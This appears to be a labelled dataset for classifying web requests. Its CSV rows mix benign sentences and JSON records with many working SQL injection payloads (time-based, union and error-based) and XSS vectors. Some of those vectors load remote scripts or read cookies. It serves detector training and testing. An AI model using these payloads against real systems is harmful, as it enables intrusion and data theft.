1974,1974,1974,1974,1974#",2,SQLi,15557 select sleep ( 5 ) and ( 'hhlq' like 'hhlq,2,SQLi,19264 "-8128"" ) ) as ovjz where 7375 = 7375 union all select 7375,7375,7375,7375,7375,7375,7375,7375,7375--",2,SQLi,14121 "1' ) ) as jpxj where 6153 = 6153 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13964 "1 ) as cnpv where 4902 = 4902 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,16422 <figcaption id=x tabindex=1 onactivate=alert(1)></figcaption>,1,XSS,3292 "{""id"":null,""name"":""Mawile""}",3,normal,27097 Likely: 20 percent – 40 percent off select styles; through May 30.,3,normal,25910 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and 'rfgj' like 'rfgj",2,SQLi,14042 1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and 'hokd' = 'hokd,2,SQLi,16503 "1' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'akyc' = 'akyc",2,SQLi,11086 "<style>@keyframes x{}</style><select style=""animation-name:x"" onanimationend=""alert(1)""></select>",1,XSS,1518 <button onFocusIn=javascript:alert(1)>,1,XSS,8533 "<style>@keyframes x{}</style><tt style=""animation-name:x"" onanimationend=""alert(1)""></tt>",1,XSS,1783 Select wilt.,3,normal,24680 "<P STYLE=""behavior:url('#default#time2')"" end=""0"" onEnd=""javascript:alert(1)"">",1,XSS,2072 "-2006' ) ) union all select 7852,7852,7852,7852,7852--",2,SQLi,18004 Let's decide where to have our lunch.,3,normal,23768 "1"" ) ) and sleep ( 5 ) #",2,SQLi,21243 "No ""Cheerios or sugary cereal"" to select from, he says.",3,normal,25872 "<a href=""\x09javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2434 <var id=x tabindex=1 onfocus=alert(1)></var>,1,XSS,6859 "1%' ) ) ) union all select null,null,null,null,null,null#",2,SQLi,17499 Identify columns where valid.,3,normal,23314 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--",2,SQLi,15460 Select a spot.,3,normal,22799 "1 ) where 4710 = 4710 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,11603 1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'svhx' = 'svhx,2,SQLi,10684 "-9062"" or 6872 = 6872 and ""aumq"" like ""aumq",2,SQLi,19216 <isindex onpointermove=alert(1)>XSS</isindex>,1,XSS,6587 "<nextid onbeforepaste=""alert(1)"" contenteditable>test</nextid>",1,XSS,3219 <label onpointerdown=alert(1)>XSS</label>,1,XSS,7669 convert,3,normal,23231 "{""id"":null,""name"":""Hare""}",3,normal,27027 "<audio onmouseenter=""alert(1)"">test</audio>",1,XSS,7191 "1'+ ( select 'uzaw' where 9900 = 9900 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) +'",2,SQLi,12029 1' where 2911 = 2911,2,SQLi,21778 %22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E,1,XSS,798 "-6854"" where 7794 = 7794 union all select 7794,7794--",2,SQLi,18083 Select your favorite color from the palette.,3,normal,24180 "1"" rlike sleep ( 5 ) and ""veub"" = ""veub",2,SQLi,19584 "-4885 union all select 4589,4589,4589,4589,4589,4589,4589,4589,4589,4589#",2,SQLi,15890 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,13064 "1%' ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11325 Select your objective.,3,normal,24848 <style onpointerdown=alert(1)>XSS</style>,1,XSS,7773 "select * from users where id = 1 or \.<1 union select 1,@@VERSION -- 1",2,SQLi,16139 `'><script>\xE2\x80\x88javascript:alert(1)</script>,1,XSS,5311 "<IMG SRC=javascript:alert(""XSS"")>",1,XSS,9317 or 'whatever' in ('whatever'),2,SQLi,20663 "<picture draggable=""true"" ondragenter=""alert(1)"">test</picture>",1,XSS,3103 "First, you can select photos from the Camera Roll tab.",3,normal,26192 "<meta ondblclick=""alert(1)"">test</meta>",1,XSS,8279 "-8256"" ) ) ) or 6872 = 6872 and ( ( ( ""lrtu"" = ""lrtu",2,SQLi,18191 "1"" ) where 1024 = 1024 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11483 <noembed onpointerdown=alert(1)>XSS</noembed>,1,XSS,6696 "<a target=""x"" href=""xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>",1,XSS,28 "<progress onmouseenter=""alert(1)"">test</progress>",1,XSS,5767 "<noembed oncontextmenu=""alert(1)"">test</noembed>",1,XSS,6032 "1"" ) ) as lslk where 6729 = 6729 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11071 "<noembed draggable=""true"" ondragleave=""alert(1)"">test</noembed>",1,XSS,3101 Here's how I select my seat every time I fly.,3,normal,26106 "1' ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 'yiem' = 'yiem",2,SQLi,10948 Select your path.,3,normal,24788 1 ) where 7165 = 7165 and sleep ( 5 ) #,2,SQLi,19623 "1"" ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ""stcv"" = ""stcv",2,SQLi,12547 "1"" ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,17650 "<dd onkeyup=""alert(1)"" contenteditable>test</dd>",1,XSS,6073 <script>\u0061\u006C\u0065\u0072\u0074(1)</script>,1,XSS,5702 "select sleep ( 5 ) and ( ""tlbj"" like ""tlbj",2,SQLi,19282 "1' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( 'mevd' = 'mevd",2,SQLi,12641 "1"" ) as kslq where 8669 = 8669 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14056 -4363%' ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( '%' = ',2,SQLi,12642 <SCRIPT SRC=http://xss.rocks/xss.js?< B >,1,XSS,7599 select ( case when ( 1898 = 4705 ) then 1898 else 1/ ( select 0 ) end ) --,2,SQLi,15763 Select the ideal lighting for your room.,3,normal,24214 "-7194'|| ( select 'gbrx' from dual where 6205 = 6205 union all select 6205,6205,6205,6205,6205,6205,6205#",2,SQLi,13849 "1"" ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ""ieuj"" like ""ieuj",2,SQLi,16597 "<section onmousemove=""alert(1)"">test</section>",1,XSS,6456 "<nobr onpaste=""alert(1)"" contenteditable>test</nobr>",1,XSS,5120 <label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus>,1,XSS,2233 I need to decide where to go for shopping.,3,normal,23961 Select a dance move to perform.,3,normal,24198 "<style>@keyframes x{}</style><tbody style=""animation-name:x"" onanimationend=""alert(1)""></tbody>",1,XSS,1592 "1' in boolean mode ) union all select null,null#",2,SQLi,18737 "1%' ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( '%' = '",2,SQLi,12032 or uname like '%,2,SQLi,22116 <img id=x tabindex=1 onfocusin=alert(1)></img>,1,XSS,6474 "1 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13846 "1"" where 6347 = 6347 union all select null,null,null,null,null,null,null,null#",2,SQLi,15328 "-5225' ) ) as zats where 5629 = 5629 union all select 5629,5629,5629,5629,5629--",2,SQLi,15186 "<style>@keyframes x{}</style><area style=""animation-name:x"" onanimationstart=""alert(1)""></area>",1,XSS,1594 <nav onpointermove=alert(1)>XSS</nav>,1,XSS,8640 "<style>:target {color: red;}</style><big id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></big>",1,XSS,1084 "<hgroup draggable=""true"" ondrag=""alert(1)"">test</hgroup>",1,XSS,4376 "<object onbeforepaste=""alert(1)"" contenteditable>test</object>",1,XSS,3223 "<base onmousemove=""alert(1)"">test</base>",1,XSS,7855 "1%"" ) ) ) union all select null,null#",2,SQLi,19893 <slot id=x tabindex=1 ondeactivate=alert(1)></slot><input id=y autofocus>,1,XSS,2305 "<noframes onpaste=""alert(1)"" contenteditable>test</noframes>",1,XSS,3548 "1' ) where 9304 = 9304 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14187 "1'|| ( select 'mjkz' where 9430 = 9430 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) ) ||'",2,SQLi,10620 "Now you can tap the cursor to pick it up and drag it exactly where you want, triple-tap to select sentences, quadruple-tap to select paragraphs, and paste text by pinching three fingers.",3,normal,25863 <output onpointerleave=alert(1)>XSS</output>,1,XSS,6870 "<iframe src=""""/srcdoc='<svg onload=alert(1)>'>",1,XSS,6514 "`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,18042 Usually these electors select the candidate you'd expect them to select.,3,normal,25194 &lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;,1,XSS,2715 "{""id"":null,""firstName"":""Sindy"",""lastName"":""Chu"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27485 <summary onpointerleave=alert(1)>XSS</summary>,1,XSS,6349 "-1174"" union all select 4303,4303,4303,4303#",2,SQLi,19122 "1'|| ( select 'bnaz' from dual where 7168 = 7168 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11167 Select a travel destination for an adventure.,3,normal,24244 ORDER BY 6#,2,SQLi,22364 "<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script",1,XSS,1906 <area id=x tabindex=1 onactivate=alert(1)></area>,1,XSS,5727 "<nobr ondblclick=""alert(1)"">test</nobr>",1,XSS,8263 1 where 4985 = 4985 order by 1#,2,SQLi,20498 They joined the yoga class.,3,normal,23010 "<style>@keyframes slidein {}</style><var style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></var>",1,XSS,436 1 ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,18228 "1%"" ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13260 "<SCRIPT a="">"" SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,4858 Select adapt.,3,normal,24780 "{""id"":null,""name"":""Bat""}",3,normal,27055 "&lt;BR SIZE=\""&{alert('XSS')}\""&gt;",1,XSS,8989 "<basefont onbeforecopy=""alert(1)"" contenteditable>test</basefont>",1,XSS,2836 "<svg><a xlink:href=""javascript:alert(1)""><text x=""20"" y=""20"">XSS</text></a>",1,XSS,2205 "<IMG SRC=x onstalled=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3447 select ( case when ( 3681 = 5026 ) then 3681 else 3681* ( select 3681 from information_schema.character_sets ) end ) #,2,SQLi,13231 "Select the account you just added and press ""A"" on the controller, select ""Sign in,"" and press ""A"" again.6.",3,normal,25605 <summary onpointerout=alert(1)>XSS</summary>,1,XSS,6965 "<li onmouseleave=""alert(1)"">test</li>",1,XSS,8704 "<meta oncontextmenu=""alert(1)"">test</meta>",1,XSS,7509 "<option draggable=""true"" ondrag=""alert(1)"">test</option>",1,XSS,4282 "<strong draggable=""true"" ondragend=""alert(1)"">test</strong>",1,XSS,3769 Select next.,3,normal,24491 Calculate sums where necessary.,3,normal,23340 -1711 ) where 9098 = 9098 order by 1#,2,SQLi,19887 <button onUnload=javascript:alert(1)>,1,XSS,8756 "1%' ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13232 union ( select @@version ) --,2,SQLi,20680 AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i,2,SQLi,14155 "1"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""dqis"" = ""dqis",2,SQLi,11127 Create a memorable event for your guests.,3,normal,22995 "<style>:target {color: red;}</style><menuitem id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></menuitem>",1,XSS,745 "<i ondblclick=""alert(1)"">test</i>",1,XSS,9329 WHERE 1=1 AND 1=1#,2,SQLi,22027 <blockquote onpointerover=alert(1)>XSS</blockquote>,1,XSS,5380 ")) or sleep(__TIME__)=""",2,SQLi,21262 1%' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( '%' = ',2,SQLi,10431 "<optgroup onkeydown=""alert(1)"" contenteditable>test</optgroup>",1,XSS,3240 <hgroup onpointermove=alert(1)>XSS</hgroup>,1,XSS,7243 "1' in boolean mode ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13235 "<style>:target {color:red;}</style><caption id=x style=""transition:color 1s"" ontransitionend=alert(1)></caption>",1,XSS,934 <kbd onpointerenter=alert(1)>XSS</kbd>,1,XSS,8385 "1, ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 7823 = 7823 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,10912 -9393' where 3119 = 3119 or 8571 = 8571--,2,SQLi,19426 1' and 1=(select count(*) from tablenames); --,2,SQLi,18899 "<iframe onbeforecut=""alert(1)"" contenteditable>test</iframe>",1,XSS,3486 1' and sleep ( 5 ) #,2,SQLi,21879 "?pg=javascript:alert(1)"",",1,XSS,9712 "-4605"" ) union all select 8542,8542,8542,8542,8542,8542,8542,8542--",2,SQLi,16485 "-5652%' ) union all select 4447,4447,4447,4447,4447,4447,4447,4447,4447--",2,SQLi,15886 "<style>:target {color:red;}</style><td id=x style=""transition:color 1s"" ontransitionend=alert(1)></td>",1,XSS,1370 "?asfunction:getURL,javascript:alert(1)//"",",1,XSS,7593 "ABC<div style=""x:\x0Cexpression(javascript:alert(1)"">DEF",1,XSS,4206 "1' ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( 'aqdj' = 'aqdj",2,SQLi,12234 "<style>@keyframes x{}</style><source style=""animation-name:x"" onanimationend=""alert(1)""></source>",1,XSS,1549 -3161' ) or 8501 = 1796,2,SQLi,21330 "{""id"":null,""firstName"":""Petrina"",""lastName"":""Ngo"",""address"":""1950 5th Ave"",""city"":""646"",""telephone"":""5409208633""}",3,normal,27162 "This arrangement lasted until 1565, when the burgesses put in a claim to their right of election, and it was decided that out of four burgesses nominated by the lord of the manor the jury of the court leet should select the mayor.",3,normal,25308 "1"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( ""yxpo"" like ""yxpo",2,SQLi,12224 "1 ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10736 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#",2,SQLi,13440 "1"" ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ""knbx"" = ""knbx",2,SQLi,15103 1' and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and 'foju' = 'foju,2,SQLi,10034 1 RLIKE SLEEP(5)# 1337,2,SQLi,21376 He picked a bouquet of flowers from the garden.,3,normal,23945 <input4 onpointerout=alert(1)>XSS</input4>,1,XSS,7482 "<IMG SRC=""jav ascript:alert('XSS');"">",1,XSS,8548 "<style>:target {color:red;}</style><var id=x style=""transition:color 1s"" ontransitionend=alert(1)></var>",1,XSS,1287 or userid like '%,2,SQLi,22077 "<q onmouseover=""alert(1)"">test</q>",1,XSS,9277 "-5866' ) ) as phzq where 3803 = 3803 union all select 3803,3803,3803,3803,3803,3803,3803,3803--",2,SQLi,14399 <tr onpointerenter=alert(1)>XSS</tr>,1,XSS,8828 <optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus>,1,XSS,1937 select case when 6662 = 9889 then 1 else null end--,2,SQLi,18353 "<dt draggable=""true"" ondragstart=""alert(1)"">test</dt>",1,XSS,4901 -8513' union all select 7414--,2,SQLi,20531 "1%"" ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( ""%"" = """,2,SQLi,10686 "<IMG SRC=x ondrag=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3993 "<IMG SRC=x onwaiting=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3449 "select * from generate_series ( 6468,6468,case when ( 6468 = 7999 ) then 1 else 0 end ) limit 1--",2,SQLi,14327 "<div draggable=""true"" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead>",1,XSS,1187 "1' ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13675 <button onInput=javascript:alert(1)>,1,XSS,8973 "<noscript onkeypress=""alert(1)"" contenteditable>test</noscript>",1,XSS,3023 ":ex/**//*/*/pression(alert(""""))'>",1,XSS,9371 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'gpeo' like 'gpeo",2,SQLi,13648 -4032' ) where 5157 = 5157 or 1809 = 2810#,2,SQLi,19316 -3424' ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 'dyuo' = 'dyuo,2,SQLi,9979 <plaintext onpointerup=alert(1)>XSS</plaintext>,1,XSS,6213 Otherhood arrives on Netflix and in select theaters on August 2.,3,normal,25805 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--",2,SQLi,19254 "<dir draggable=""true"" ondragleave=""alert(1)"">test</dir>",1,XSS,4597 -8809'|| ( select 'hyzr' where 5694 = 5694 union all select 5694--,2,SQLi,16636 "1"" ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( ""eslj"" like ""eslj",2,SQLi,12108 "1%"" ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15245 "-3443"" ) ) union all select 4043,4043,4043,4043,4043,4043,4043#",2,SQLi,16836 "1 where 9869 = 9869 union all select null,null#",2,SQLi,18883 "1 ) ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 4744 = 4744",2,SQLi,12218 if ( 3490 = 4920 ) select 3490 else drop function hlzt--,2,SQLi,17615 "1' ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'xhez' like 'xhez",2,SQLi,10354 """><iframe src=""javascript:alert()"">",1,XSS,9126 "1%"" ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ""%"" = """,2,SQLi,13270 "<html onkeyup=""alert(1)"" contenteditable>test</html>",1,XSS,5144 "<xmp draggable=""true"" ondragend=""alert(1)"">test</xmp>",1,XSS,4995 "<IMG SRC=x onwheel=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3813 "<img src=""1"" onerror=""&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"" />",1,XSS,2293 "<style>:target {color:red;}</style><link id=x style=""transition:color 1s"" ontransitionend=alert(1)></link>",1,XSS,1218 "1%"" ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( ""%"" = """,2,SQLi,15141 "<IMG SRC=x onresize=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3605 )) or pg_sleep(5)--,2,SQLi,21918 1' ) where 6222 = 6222 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --,2,SQLi,15365 23 OR 1 = 1,2,SQLi,22407 1 where 4153 = 4153 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10729 1 ) order by 1#,2,SQLi,22177 "1"" ) where 2016 = 2016 and ( 1547 = 2093 ) *2093--",2,SQLi,18495 "<style>@keyframes x{}</style><body style=""animation-name:x"" onanimationend=""alert(1)""></body>",1,XSS,1661 1' ) where 4277 = 4277 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,10286 1'|| ( select 'bqhi' from dual where 7409 = 7409,2,SQLi,18712 1' ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( 'eqfh' = 'eqfh,2,SQLi,15260 "<foreignObject xlink:href=""data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E""/>",1,XSS,844 "<script\x0Atype=""text/javascript"">javascript:alert(1);</script>",1,XSS,2979 "<html oncontextmenu=""alert(1)"">test</html>",1,XSS,7411 "1' ) as bxae where 4143 = 4143 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,12242 "1%' ) ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( '%' = '",2,SQLi,12298 "1 ) as nkjo where 8462 = 8462 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,14518 <script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus>,1,XSS,2093 1'+ ( select gguu where 7809 = 7809 union all select null--,2,SQLi,17303 <kbd id=x tabindex=1 onfocusin=alert(1)></kbd>,1,XSS,6369 "<caption draggable=""true"" ondragstart=""alert(1)"">test</caption>",1,XSS,3065 "1"" ) ) as fjtv where 8904 = 8904",2,SQLi,20265 "<p onmousedown=""alert(1)"">test</p>",1,XSS,9194 <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>,1,XSS,793 "1'+ ( select sshu where 3442 = 3442 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ) +'",2,SQLi,11024 "1 ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( 5524 = 5524",2,SQLi,12480 "{""id"":null,""firstName"":""Lih Fua"",""lastName"":""Lua"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27574 <image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus>,1,XSS,2635 <summary id=x tabindex=1 onbeforeactivate=alert(1)></summary>,1,XSS,3299 <acronym onpointerup=alert(1)>XSS</acronym>,1,XSS,7158 1' where 8469 = 8469,2,SQLi,21837 "1"" ) and 3732 = 3850 and ( ""edjv"" = ""edjv",2,SQLi,19421 "1%"" ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14995 <header id=x tabindex=1 onfocus=alert(1)></header>,1,XSS,5523 <ruby id=x tabindex=1 onfocusin=alert(1)></ruby>,1,XSS,6006 "1' where 9241 = 9241 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13044 "<cite draggable=""true"" ondragstart=""alert(1)"">test</cite>",1,XSS,4102 <code onpointerleave=alert(1)>XSS</code>,1,XSS,7929 "-2007%' ) ) union all select 7298,7298,7298#",2,SQLi,19126 Select theaters will start showing the film on April 28.,3,normal,25579 "1"" ) ) as thoj where 1577 = 1577 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11116 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( ""bhmu"" like ""bhmu",2,SQLi,15269 -8264%' ) order by 1#,2,SQLi,21646 "onmouseover=alert(1)//%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E%3Cx onxxx=alert(1) &#00;</form><input type&#61;date"" 